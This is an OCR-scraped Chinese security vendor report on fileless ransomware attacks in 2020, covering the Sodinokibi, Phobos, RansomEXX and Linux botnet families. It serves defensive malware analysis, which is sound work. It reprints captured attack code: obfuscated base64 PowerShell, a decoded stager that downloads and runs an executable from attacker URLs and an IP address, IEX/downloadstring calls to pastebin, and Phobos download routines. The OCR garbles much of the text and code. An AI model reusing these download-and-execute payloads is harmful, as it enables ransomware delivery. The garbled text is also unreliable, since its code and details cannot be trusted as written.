2020年无文件病毒攻击分析.docx

《2020年无文件病毒攻击分析.docx》由会员分享，可在线阅读，更多相关《2020年无文件病毒攻击分析.docx（27页珍藏版）》请在课桌文档上搜索。

1、101O1Ijol11。1001o02020年无文件攻击防护分析11OIIlB口1111101011I.2020庄恶意病毒综述1101(Oi010110101Oo1o10100目录2020年恶意病毒综述01无文件勒索病毒分析03无文件攻击WindOWS平台特定攻击技术无文件攻击1.inUX平台特定攻击技术勒索病毒的无文件攻击技术新趋势05待分析样本类型介绍06SOdinOkibi家族勒索无文件攻击技术分析EWindows平台Phobos家族勒索无文件攻击技术攻击匚WindOWS平台RansomEXX勒索无文件攻击分析口1.inux平台BOtnet无文件攻击分析口1.inux平台无文件攻击勒索病

2、毒的有效解决方案23总结252020年恶意病毒综述20次量公司内网节点被暴露在公网之中，攻击面被人为放大，公司外部链接增多，企业不得不重新考虑内网信息的保护方式。在上述背景之下，2020年威胁趋势也与往年有很大不同。亚信安全威胁情报团队收集了历年的威胁样本数据，并且对威胁样本数据深入分析。从威胁样本数据分析报告来看，我们总结以下几点:1.2020年的攻击造成经济和名誉损失最大的是勒索病毒，图1描述勒索病毒造成的直接损失趋势，2020年上升了50%左右，年总损失高达400亿，平均每个月都会发生一起严重的勒索病毒攻击事件。勒索软件造成的匕接经济损失图1勒索软件历年估算损失2 .病毒软件呈现了多平台

3、的趋势，不光WindOWS勒索病毒呈现井喷趋势，1.inux平台的勒索病毒的数量也逐步呈现指数级增长。3 .病毒攻击方式产生了很大的变化，2020年新增的勒索样本大多数采用无文件攻击技术，据不完全统计，2020年成功入侵的攻击事件中，80%都是通过无文件攻击完成，传统的防病毒工具对此攻击收效甚微。勒索病毒从2017年的WannaCry事件之后，迅速进入我们的视野,在2020年达到新的高度，它们不断变换新的攻击技术，如无文件攻击技术，同时也在不停尝试转换攻击目标，从之前的个人勒索转向企业平台勒索，主要用于企业服务器的1.inUX平台也顺理成章成为了勒索攻击的重要目标。综合上述的数据，以及威胁情报

4、团队的总结报告，本次年报的重心将主要集中在分析勒索病毒在WindoWS平台和UnUX平台下，无文件攻击技术攻击趋势，最后提供有效的安全防御解决方案。数量图2历年勒索病毒样本分布无文件勒索病毒分析工文件攻击介绍什么是无文件攻击。无文件一词，是在探讨绕过恶意文件检测技术的方法B施生的术语。无文件攻击技术属于一种影响力非常大的安全威胁，攻击者在利用这种技术实施攻击时，大多数不会在目标主机的磁盘上写入任何的恶意PE或者E1.F文件，而是通过各种脚本，例如POWerSheII、VBS脚本、PhP脚本等，因此而得名“无文件攻击二为了更好地应对“无文件攻击二我们必须对样本深刻分析理解无文件攻击技术的底I层实

5、现,才能帮助我们实施更好的防御方案。今年非常著名的FireEye红客武器库泄漏，被攻击时所采用的攻击方式就是无文件攻击，FieEye作为全球领先的安全公司都能被无文件攻击攻陷，这也从侧面反映了该技术的难以被检测，需要被好好分析。无文件攻击WindoWS平台特定攻击技术：恶意文档无文件攻击并非真正的没有任何文件,相反,该攻击方式实际上是会涉及到文档文件。这些恶意文档是被植入特定威胁代码的WOrd文档、PDF文档等。0恶意脚本无文件攻击为了绕开二进制检测方法，故意不将恶意代码编译执行，而是通过脚本行,运例如POWerSheII、JS脚本.VBS脚本等，利用本地白名单程序，达到绕开防病毒检测的目的。

6、病毒执行体代码混淆无文件攻击非常依赖脚本执行，并且脚本执行体被各种私有的混淆技术改造，即使脚本被收录，专家分析团队大多数也无法回溯其工作方式。(4)无须依赖其他组件无文件攻击非常擅长利用本地环境的各种组件，例如WMlJegSVr32.exe等白名单工具,实现持久化脚本、启动脚本、横向移动攻击等。恶意文档恶意脚本内建工具内存执行图3历年勒索病毒样本分布无文件攻击1.inUX平台特定攻击技术1)通过漏洞进行感染1.inUX下的无文件病毒会通过利用1.inUX系统及其相关软件本身的漏洞进行渗透，包括网络协议本身或是浏览器的FlaSh插件的漏洞。0修改1.inUX进程通常使用PtraCe()等系统调用

7、来修改并使某个正在运行的1.inUX进程处于异常状态，然后通过异常状态实施攻击。将恶意代码注入内存当恶意软件成功使指定的1.inllX进行处于异常状态后，恶意软件便可以通过将恶意代码注入至该进程的内存空间中，从而避免将恶意代码写到磁盘上。且执行内存中的恶意代码大多数的1.inUX发行版本都预装了一系列的程序软件解释器，如Python,Perl或PhP等。无文件攻击病毒通过利用这些解释器运行注入至内存中的恶意代码。通过将恶意代码放至devshm或runshm文件夹下，它也可以直接将恶意代码当作文件在内存中直接运行。漏洞感染修改1.inUX进程内存执行代码注入图4历年勒索病毒样本分布勒索病毒的无文

8、件攻击技术新趋势从亚信安全威胁情报团队收集的数据分析来看，截止到2020年年底一共获取到的各个家族样本总数是18,158,720个，接近完整的2020年统计总体勒索样本的总和，如图4,我们罗列了样本家族的分布，如图5:勒索家族占比Sodinokibi,GIobeImPoster,Dharma,Phobos,Nemty分别位列第一、二三区五，其中Sodinokibi的样本一共收集了403万个左右，接近15%,GIobeImPoster样本一共收集了290万个左右，接近11%,Dharmal1%,Phobos7%,Nemty6%,这些高占比的病毒家族能够在众多的勒索病毒家族中脱颖而出，大量传播，他

9、们的攻击方式值得我们深入分析，通过重点分析，发现其攻击方式中本质，能够提出更加有效的防御方案。待分析样本类型介绍SOdinOkibi家族勒索无文件攻击技术分析本文中选择的样本包括WindOWS平台五大勒索病毒家族的样本的两大类家族SodinOkibi家族和PhobOS,1.inux平台的RanSOmEXX家族、Botnet家族样本，这些样本在对应平台下的占比比较高，都使用无文件攻击技术作为主要的攻击方式，在各自对应的WindoWS平台和1.inUX平台的具有代表性。WindOWS平台SodinOkibi勒索病毒在国内首次被发现于2019年4月份，2019年5月24日首次在意大利被,在意大利被发

10、现时，该病毒使用RDP攻击的方式进行传播感染，这款病毒被称为GandCrab勒索病毒的接班人，在GandCrab勒索病毒运营团队停止更新之后，就马上接管了之前GandCrab的传播渠道，经过近一年的发展，这款勒索病毒使用了多种传播渠道进行传播扩散，包含利用各种WEB漏洞、FiaSh漏洞、钓鱼邮件、水坑攻击，漏洞利用工具包下载执行脚本等无文件攻击方式，主要的攻击流程见图6。Q一O潮宽骁取调求访问谪求注入执行加比勒索Ea图6SodinOkibi勒索病毒执行流程(1) 无文件攻击方式分析根据亚信安全最新截获的Sodinokibi勒索病毒多个变种样本显示，其利用恶意网站伪装成游戏辅助工具欺骗用户下载。

11、当用户点击下载辅助的工具的链接后，该病毒通过一系列的无文件攻击手段，最终直接在内存中运行，进行传播和勒索。该病毒利用了无文件攻击中多个特征的技术： 内存执行 POWerShelI脚本等执行 多层的脚本间接混淆加密真正的病毒执行体0SOdinOkibi勒索病毒样本分析一旦用户浏览了植入该恶意病毒的网站，点击特定的链接，则触发该病毒执行，该病毒会通过在磁盘中创建白名单文件或者感染白名单文件的无文件攻击方式，防止被防病毒软件查杀，然后该病毒即将磁盘中的重要文件将被加密，加密后的文件扩展名为.qv05z0总的来说，该病毒试图在内存中执行病毒攻击主体或者执行一个多级高模糊PoWerSheIl脚本，试图规

12、避各种防病毒软件和安全解决方案。此外，它使用先进的技术来躲避沙箱，像这样的无文件攻击自2017年以来一直在显著发展，对基于签名和行为安全工具都提出了严峻挑战。在我们的调查中，我们发现了以下信息：tIUlKNrwrttIUlUlWfFrwnrrocMtNUir4f*Mt*rw*MHUW*FmE”NC40IHC,Mrtcoc*该勒索病毒被启动后，会通过白名单工具PoWerShelI执行base64编码的命令。这是一种典型的无文件攻击方式，采用各种混淆技术，混淆病毒代码，只有指定的脚本能够解密代码执行，给反病毒引擎造成了极大的检测困难。C:XVlndowsSyOM4VindwsPotrShellVl

13、.epMftell.xYnCXAMCAAlQACcAb9BAMcAj1.rACc1.QBPAElAArACcAagAnAClJUMeIACIUdAAnACkAIAAgAFMAiQeTAFa81AGeAYAAUjkGutMe9AC4AOPAEeABSAGAPQ9AHRAUMepAE3A80ACUZA81AGYAbAB8FQAZQ9AHUVAftSAeUAQQeUCgAgZAMal3Ab(MuAkATMM0Aft6NAEUC90ZAHUM8yAGuAQoBWeMheMFkWweUAGUATOAafUTe(UFYAZQeyM(MXQMAOoA29SAGMTQBCAGUcYUO心gAHQJkgBPAG

14、wtWAoAUNAfiMElAZgBhUgASQe3AYATQYGYAQgAyUMAT81A3AUBJAGMBPAOAe1AECAZ9yMUVQe3AkAbQSXA9BUDMZAeiAEMABG8ATABlMAaeo8NOMWWeTADC3血8ANQeFADMMAZAMJaA%WyAC063FAVjVAASAMAfUAb*嫉EAeQetMMBgBZAaUZ6hNaQAMV0eKF3g8MEWm&GtUueFaCeeMEXAewcAUQeGMAANgeEMWWAHOAYgBFj1.EumeHGINweTAaAb0e3AM9AZ00H9AUSWkAUQA1MIAftweUFMUaA9AeAGUAB

15、JC3ABRoAUNMcWe任KAaABXAHYWgAXAE3E&33AVgeyqCAs8gAZgAWoJ1.0AB3gAa9AA帆6内访中332&8AFabJ1.BS&3UBJAH*ABr“lNgBTAFYAbABYAMAANaeOAFENg9vAGuUQeUGUMJUUAcMkMg84AHC4SQ8DMb川AE33AHCMQ6KAFOAMteuAfOA(S3M(UUBBAMUASQecAHeASHTAFcAVQeMHCAVaAHUMOeSA“TA88MeMg8CADUWOBsAO38r“VAHQe”GsAZABFAMYAMeOAEQATAByMNAZgBCAEgABUAeiecAEgABg

16、必J11ABAFkSgea=ZMuABPQiUMgA”EVAQg8v4I4B4AMQAZlAEYAU98JAe3UBPAEoAe9B“E3taBFXJUM6XHARABYMUOABeAM38XAGJUMB6kAlueTXGoAQ*8dD3但AF3XBTAG43BPa3aO&”FYMufinGcMMA(UAMQeIMCACABIA8Abg8IADVMA”GcA198UeuWYANgC8ejAD4UlUAAnACUIMsAFUcweZAMUVA81(Al98p38A1.9B)A8AT0eFIAZQeTAHA4AT。阶1E8RQ8QegAGU9flAFMAYA8UAHIlZQehAGeAUQBFAl

17、RA8FV!AKAJUiAF8AlA8MMHAtAOg8hAMAp三三图8Sodinokibi勒索病毒POWerSheil混淆后的执行体被解码后勒索病毒脚本命令内容也并不包含直接造成危害的病毒执行体代码，其通过另一个混淆和编码命令阶段，采用间接的攻击方式。这种多层间接的方式，即使采用行为检测引擎，也很容易造成误报和漏报：.(nEwi-OBfjiecti)SYSTn.lo.COKPREsSiON.dofIATcSTRfAm(sySt.IOeMEMOrYstroAmJaYSTeM.CONVerT):FRoMBase64strinG(9TZBRb4IwFIXflw9IGlEGaJjkWFkGURY4

18、gGjbqwZFtiwQ1.dKnloFZnhv4l6vZy785957vaEEdCDd0KZ2VWhq1.6ISUoRppDg401KfKUMm1.Cd2hqZ70JETmSV3ZtdPiy9ZAOC2hCnV4uJpkihogjBslhsukXgzmlESriatsF/68*fVkQdzpYRiwweicdzVJhMYlzukOKS4sWVfcSjPOKyRy8cS87TFhWMoeyo4MikYVTq8g4ab8p1.gJNelYCF2dkgjQAtwfWKcVFmfzhGRz6uQcoynARvGe7BmddwgxToeg3yIaOTtBSKtGPXYlwUi13DicpBJyOgNf

19、z3DXB68ynOCi4VTSRalDwhUn44z*qN10qXo7blF9uOyRYJfnpaVwQjFlf8GK2Rz7KlUGIUZfmukOHlF3IC6dhf17lGVyd2oGG4tzct)9(YsTca.locOMpRcSslON.ComprossIONMODeiSDEConproSS)lI.(,I,*EtX*图9SodinOkibi勒索病毒一层解混淆后P。WerShel代码间接解码阶段完成后，样本释放了一个简单的PoWerSheII代码，该病毒样本真正的容貌才开始展示：SlyIpaKS=,Ki1.rd;UPwPWw=$env:userprofile+*+5IyIpaKS+*

20、.exe,;So4f9Ud=.(,n*ew-o+,bject,)NeT.WebC1.ieNT;SVURDOAZCihXX0:fuamyIleibrahim1.1top/svwo/fqoowf.1DhD?ldxt:l,ass2.qxl.split(,%);foreach($IPpm4NiWinSvuRDOAzC)try($o4f9Ud.DowNloaDfIlE(9ZPpn4NiW,$UpwpWW);If(.(,Get-I,+te,+,m)$UpwpWW).IENGth-ge2977)Diagnostics-Process:STaRt(5UpwpWW);break;)C4tch);IEX(5o4f

21、SOd.Down1.OaDStrlng(hxx0:1R51.11931.11411.1248sI.Iphp)；图10Sodinokibi勒索病毒两层解混淆后P。WerShei代码最终的PoWerSheIl脚本仅仅是一个跳板，不会造成最具威力的破坏。该段脚本代码试图下载并执行一个名为Ki1.rd.exe文件，该文件来自恶意UR1.Yhxxp:fcamylleibrahim.top/sy-wofgoow.php7l=dxclass2.gx;该勒索病毒下载的可执行文件被保存到用户目录默认文件夹中，该文件夹被环境变量“$env:USerProfiIe,表示，H（C:Usersuseruser_name

22、J。我们尝试下载可执行文件，但不幸的是，在调查的持续期间，恶意UR1.已经不可用力Ki1.rd与乂进一步尝试从另一个UR1.下载其他代码:UR1.hxxp:185.193.141.248gs.php”:f($ENV：PROCESSoR_ARCHITECTURE-contains,AMD64,)Start-Process-FilPath$Env:WINDIRSysWOW64WindowsPowrSh*llvl.0powrshell.n-ArguMnteIEX(new-objectnet.webclient).downIoadstring(，https:/pastebn,cOe/rawCY2EEM

23、JN,)；Invoke-OKBO1.XIE;Start-Sloop-s1000000;Ielse(IEX(ncw-objoctnot.wobcllent).downloadstring(https:/PaatObI图11Sodinokibi勒索病毒Ki1.rd下载的PhP文件至此，经过复杂的多层间接步骤，该勒索病毒终于将病毒攻击代码放到被感染主机，此病毒代码首先检查主机的处理器体系结构，以便启动正确的POWerShell实例（32位或64位），然后启动POWerShell进程，该进程调用驻留在其他UR1.中的代码YhttP:PaSraw-CY2EEMJN工经过深入分析，我们发现该代码是一个Em

24、pire模块（如下所述），其源代码在GitHUb项目中，我们对该模块也进行了分析：EmPire是一个后端开发框架，包括一个纯POWerShelI2.CWindowsagent和一个纯Python2.6/2.7的1.inUX/OSXagent,该项目即较早的PoWerSheIlEmpire和PythOnEmPyre项目的合并。Empire框架提供了加密安全通信和灵活的体系结构。在PoWerShelI方面,Empire实现了运行PoWerSheIl代理而无需父进程，可快速部署的后开发模块，从关键记录器到Mimikatz,以及可适应的通信，以逃避网络检测，所有这些都封装在一个以可用性为中心的框架中。

25、通过上述方式，降低了病毒的外部依赖，甚至无需任何外部依赖，就可以完成整个攻击链的整合，这点非常重要。攻击者使用上述模块将D1.1.文件（勒索病毒反射式加载到PoWerSheII进程中，该D1.1.是从内存而不是从磁盘加载的。这种绕过防病毒软件的规避技术是一种非常巧妙的无文件攻击方式。攻击者创建了一个包含恶意D1.1.文件的字节数组，该文件反射性地将字节数组加载并硬编码到脚本中，这样做的一个好处是，他们可以加密字节数组，并在内存中解密它，这绕过了反病毒引擎。这是攻击者EmPire脚本中的一部分，它是一个用base64编码并转换为字节数组的D1.1.:图11Sodinokibi勒索病毒Ki1.rd

26、下载的PhP文彳牛一旦此模块与PoWerShell一起运行，恶意D1.1.将在PoWerShelI进程内存中自行执行，并对受感染计算机的文件进行加密，然后删除一个指令文件，以要求用户为解密加密文件支付赎金。此勒索软件将勒索消息放在包含加密文件的文件夹中，文本文件的名称取决于添加到加密文件的扩展名，并且是随机生成的。例如，如果扩展名为“qv05z”,赎金消息文件名将被称为qv05z-readme.txt,o最终勒索软件对文件进行加密并更改桌面墙纸，还转储了一个txt文件以获取有关如何为解密文件支付勒索费的说明，如下面的屏幕截图所示：图13SodinOkibi勒索病毒勒索界面0攻击ll攻击流在攻击

27、回溯中构建攻击上下文，组织攻击者的执行步骤，这对病毒分析来说非常重要。接下来，我们构建该勒索病毒家族的攻击流，并从中发现无文件攻击行为的蛛丝马迹。首先，我们构建了执行PoWerShell命令时的进程树上下文，该勒索病毒通过将病毒代码反射到PoWerShelI进程中，所以该进程树上下文中，存在多个POWerShell的进程，并且该Pow-erShell还尝试禁用多项本地安全组件以及协助加密本地文件：S&powershell.exe(4388)斌Conhostexe(9028)BBPowershel.exe(8624)fConhost.exe(9716)-ggcmd.exe(2200)8Conho

28、s1.exe(798WindowsPowerS.C:WndowsSys.ConsoleWindow.WindowsPowerS.ConsoleWindow.WindowsComma-ConsoleWindow.Vssadminexe(88CommandUneIntC:WindowsSysC:WindowsSyst.C:WindowsSy3.C:WmdowsSyst.C:WindowsSys.C:WrdowsSyst.MrcrosoftCorporatFAcrosoftCocporat.MlCroSOftCocporat.MiCfosoftCo2jmphobo(iontoolp*WVlpcwnh

29、el*e该病毒使用诸如系统激活工具之类的软件作为突破，诱使用户下载运行，一旦用户中招，则其伪装成“sheepskin的PoWerShelI脚本的第一层病毒代码被运行，该POWerShelI下载另一个POWerShelI脚本:pps.ps1,pps.ps1将解密并释放病毒载体的base64编码的exe文件数据到userpro旬e%目录，加载后，该exe即开始实施对受害者计算机信息的盗窃，并进一步通过特洛伊木马下载加密的勒索相关文件。这类典型的无文件攻击方式不但降低被反病毒软件检测的风险，同时也大大降低样本被截获后分析的风险，样本要么被删除，要么只有孤岛式的部分样本被截获，没有分析的价值。fw0f

30、(0tf.00)0CNwecw)tDcwrAMr.b.10001图16Phobos勒索病毒脚本和执行流functionaugciop()(ParalMParamecer(Mandatory=STrue,Position=)string$ajaqrp,Parameter(Mandatory=STrue,Position-)(string$lidfjfoSqpzqbObj三New-ObjeccNet.WebClienttry(.$rPiO)CV-$qPZqbObj.gWnloadDatdjfo)catch(Net.ServicePointManager:SecurityProtocol=Net.S

31、ecurityProtoco:$rpiokv-SqpzqbObj.DownlcadDaca(Slidfjfo)10.File:ZWriteAllByces($ajaqrp,$rpiokv)1functionvjdncs()Param(Parameter(Mandatory-STrue,Position-)string$rrfqjjSpzcptq+=TVqQAAMAAAAEAAAA/SAA1.gAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAA,9pztq1*bDOSAAAQAAAAQBIJBAAAAAAAAAAAAAAAAAAACAAAGAuZGFOYQAAAJQMAJI；9

32、pztq4*,AAAAAAAlUUAJUkAAAJUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJ;SDNeDtq三，AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAi图17PhoboS勒索病毒执行的脚本解析文件加密后，PhObOS勒索病毒将添力口一个名为idXXXXXXXX-2275.helprecoverfox-.help的特定后缀，其甘XXXXXXXX,是磁盘序列号。同时，它将在受害计算机的桌面目录和磁盘根目录中以勒索信件的形式释放名为info.hta和info.txt的文件。通过调用具有与in

33、fo.txt相同的文本内容的info.hta程序，标题为“您的所有文件已被加密的对话框将通知受害者病毒作者的联系信息和比特币赎金付款方式。PhOboS勒索病毒主体文件在特定目录释放并运行勒索病毒：1.ast1.rr1.KKUKSUUU1.SS(UUUUUUUU)6383FA6CAIIikPrPl32.6383FA1GOSEIBB0oooooooOOOOO3100OOOO00000000100000080IHiuuuoonI00680066OOSFIBBeFileNane*CsersUSERAppData1.ocalTenp3582-*90Fast.ee(Access-GENERIC,WRITE

34、ShareHode-F11.EHARE.READFI1.E_SHARE_VRITEPSecUrityNU1.1.Hode-CREATE.NEWAttributes=NORMA1.hTpnplateFile-NU1.1.INICDFC!UsPrIISFRAnnD,taloca)Tonn38?9a1t.pp-图18PhoboS勒索病毒多层释放病毒主体PhObOS勒索病毒运行刚刚释放的勒索病毒后，接下来开始遍历磁盘感染正常的exe文件，将自身代码写入正常exe文件中，这个步骤称为感染，被感染通常是白名单程序，防病毒引擎通常可以对该类行为起到很好的阻断作用，但是如果感染的是脚本文件，大多数防病毒引擎目

35、前的检测方式都不是非常有效。然后该病毒程序结束运行，创建互斥量，以保证同一时间只有一个勒索进程在运行。IMSCDiCB.Dl1.E3ImscdiccompilerMImscprop!Msctipixi,Imsculdil201QA21M行程物最60KB202OIO1722：20应用1亨SSKBI20200722JlQffl230KB2010/1/211:45应用程丽790KB2010/1/21351F33OOOUt00009260Tenpty0.0CAII到Fdt.O133F2DpSpcu11QNU1.1.InitialOwner-FA1.SE-NutexNdRe-,Global5E26D81

36、30000000DCCfiMM-图19PhoboS勒索病毒互斥执行PhOboS勒索信截图：图20PhobOS勒索病毒勒索信0PhOboS勒索病毒无文件攻击技术总结POWerShelI脚本执行多层的脚本混淆加密PhoboS病毒家族与Dharma家族的存在着某种非常相似的，血缘关系”,他们之间的攻击方式具有非常多的相似性，所以我们分析PhObOS勒索病毒也即同等分析了Dharma勒索病毒。该病毒家族使用的无文件攻击技术点不多，但是同样达到了很好的效果，目前该勒索病毒市面变种样本以及攻击数量都很高。1.inUX平台RansomEXX勒索无文件攻击分析2020年，亚信安全已经捕获到面向1.inUX操作

37、系统的勒索软件。在2020年11月，卡巴斯基研究人员截获并给出一种新型的面向1.inUX系统的勒索病毒的分析报告。该勒索病毒名称为RansomEXXoRansomEXX的前身为面向WindoWS操作系统下的勒索病毒，其在勒索攻击事件中出现频次相当之高，仅在2020年一年间就造成了世界多家知名公司的数据加密与服务中断事件，如KonicaMinolta（日本公司，6月底遭受攻击，服务中断近一周）TxDOT（美国政府部门，Texas交通运输部，5月初开始遭受攻击）oCU无文件攻击方式异常注入脚本执行0RansomEXX勒索病毒样本分析攻击者将RanSomEXX病毒由WindoWS版本移植至1.inUX环境下，以使其能用于UnUX操作系统的攻击，从而获取更大的收益。研究表明,RansomEXX1.inUX版恶意样本通常是64位的E1.F可执行文件。该恶意软件引入了开源库mbedtls来实现其加密功能。当该恶意软件被运行后，它会生成一个256比特的密钥，该密钥会被用于加密所有受害者机器上的文件。文件加密方式采用了AES算法，其AES密钥会进一步通过恶意软件内部的4096比特的公钥进行RSA加密。加密后的AES密钥会被附加到每个被加密文件的文件尾。为了进一步提高文件加密的强度，该恶意软件还会新设一个线程，该线程以一